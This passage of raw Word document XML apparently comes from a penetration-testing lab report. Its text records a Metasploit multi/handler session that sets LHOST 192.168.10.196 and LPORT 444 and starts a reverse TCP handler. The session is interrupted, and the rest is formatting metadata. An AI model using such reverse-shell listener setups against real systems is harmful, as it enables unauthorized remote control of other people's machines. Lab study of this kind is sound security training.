          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A7E80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[-] No results from search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27839732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[-] Failed to load module: LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4C1075" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47205AA7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lastRenderedPageBreak/>
        <w:t>[-] No results from search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42A623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[-] Failed to load module: LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC7503" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C51EE4C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LHOST =&gt; 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FBD57" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F8362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LHOST =&gt; 192.168.10.196</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFF2BB" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; set LPORT 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FEF9D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LPORT =&gt; 444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148214C" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47320A1F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</w:p>
    <w:p w14:paraId="65BB12DD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 xml:space="preserve">[*] Started reverse TCP handler on 192.168.10.196:444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF9827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^</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00516482">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-] Exploit failed [user-interrupt]: Interrupt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CF147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[-] exploit: Interrupted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90F3DA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msf6 exploit(multi/handler) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E7E1D7" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1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B6F1E7" wp14:editId="7F6B11B7">
            <wp:extent cx="594360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C175" w14:textId="77777777" w:rsidR="00662E73" w:rsidRPr="00516482" w:rsidRDefault="00662E73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sz w:val="24"/>
        </w:rPr>
        <w:t>Enter id and pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D82DC" w14:textId="77777777" w:rsidR="00662E73" w:rsidRPr="00516482" w:rsidRDefault="00662E73" w:rsidP="002C66A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051648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993A1C6" wp14:editId="3FB2125B">
            <wp:extent cx="594360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3E90" w14:textId="77777777" w:rsidR="002C66A1" w:rsidRPr="00516482" w:rsidRDefault="002C66A1" w:rsidP="00FB2FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002C66A1" w:rsidRPr="0051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228"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90A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63B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57DC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2153"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D08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40A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99D2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74A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80FA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735E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B1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66C4E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59A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167979">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1566716947">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="592709772">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1666546276">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1045830949">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1441757886">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="83395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EF8"/>
    <w:rsid w:val="00045CBD"/>
    <w:rsid w:val="000D667F"/>
    <w:rsid w:val="00130ACE"/>
    <w:rsid w:val="001458A1"/>
    <w:rsid w:val="001E712C"/>
    <w:rsid w:val="00217BAE"/>
    <w:rsid w:val="002C66A1"/>
    <w:rsid w:val="00307190"/>
    <w:rsid w:val="003B77D3"/>
    <w:rsid w:val="003F3287"/>
    <w:rsid w:val="003F7CCD"/>
    <w:rsid w:val="00444EF3"/>
    <w:rsid w:val="00516482"/>
    <w:rsid w:val="00527E4C"/>
    <w:rsid w:val="005871C3"/>
    <w:rsid w:val="00662E73"/>
    <w:rsid w:val="00666925"/>
    <w:rsid w:val="007C33A3"/>
    <w:rsid w:val="00804F77"/>
    <w:rsid w:val="008E1DBF"/>
    <w:rsid w:val="008E32AE"/>
    <w:rsid w:val="009C6ADE"/>
    <w:rsid w:val="00A308DB"/>
    <w:rsid w:val="00AF5BFA"/>
    <w:rsid w:val="00C41F26"/>
    <w:rsid w:val="00D15EF8"/>
    <w:rsid w:val="00DF1CA7"/>
    <w:rsid w:val="00E46746"/>
    <w:rsid w:val="00FA37F9"/>
    <w:rsid w:val="00FB2FA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5B9F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF209659-20D8-49C2-82FC-F2BF5A4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B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itju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ZBT</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-24T13:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-24T13:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>